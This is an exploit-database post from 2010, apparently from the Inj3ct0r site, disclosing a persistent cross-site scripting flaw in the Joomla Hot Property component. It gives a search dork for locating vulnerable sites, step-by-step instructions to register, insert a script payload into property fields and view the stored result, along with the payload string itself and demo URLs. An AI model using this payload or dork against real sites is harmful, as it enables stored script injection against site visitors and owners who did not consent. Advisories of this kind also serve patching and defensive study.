Joomla Component com_hotproperty Persistent XSS Vulnerabilit
Posted on 24 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_hotproperty Persistent XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================= Joomla Component com_hotproperty Persistent XSS Vulnerability ============================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Joomla com_hotproperty Persistent XSS Vulnerability Date : july 24,2010 Critical Level : HIGH vendor URL :http://www.mosets.com/hotproperty/ Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> Dork :inurl:com_jomestate special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_:D greetz to :www.topsecure.net,SeeMe,**RoAd_KiLlEr**,indoushka,Sn!pEr.S!Te All ICW members,my friends,Hack0wn and Milw0rm :D luv y0 guyz ####################################################################################################### Description: Now you can list and manage your properties easily using Hot Property together with the best open source Web Content Management System - Joomla!. Your property can be Real Estate, Automobile, Boats, Painting, Books or anything at all! If you wish to showcase your products effectively, Hot Property is your answer. With Hot Property, you can: - Run a Real Estate website - Run a Vacation Rentals website when you buy the optional - Availability Extension - Run an Auto website - Run a DVDs website ############################################################################################################### Xploit :Persistent XSS Vulnerability Step 1 : Register and goto your panel ,add a new property :P DEMO URL :http://demo.mosets.com/hotproperty/index.php?option=com_hotproperty&task=addprop&Itemid=26 Step 2 : Insert your evil xss scripts in the fields Attack Pattern:"><script>alert("inj3ct0r")</script> Step 3 : Now go and check the home page or check your property. DEMO URL :http://demo.mosets.com/hotproperty/index.php?option=com_hotproperty&Itemid=26 Screenshot :http://img812.imageshack.us/img812/6825/proper.png ############################################################################################################### # 0day no more # Sid3^effects # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
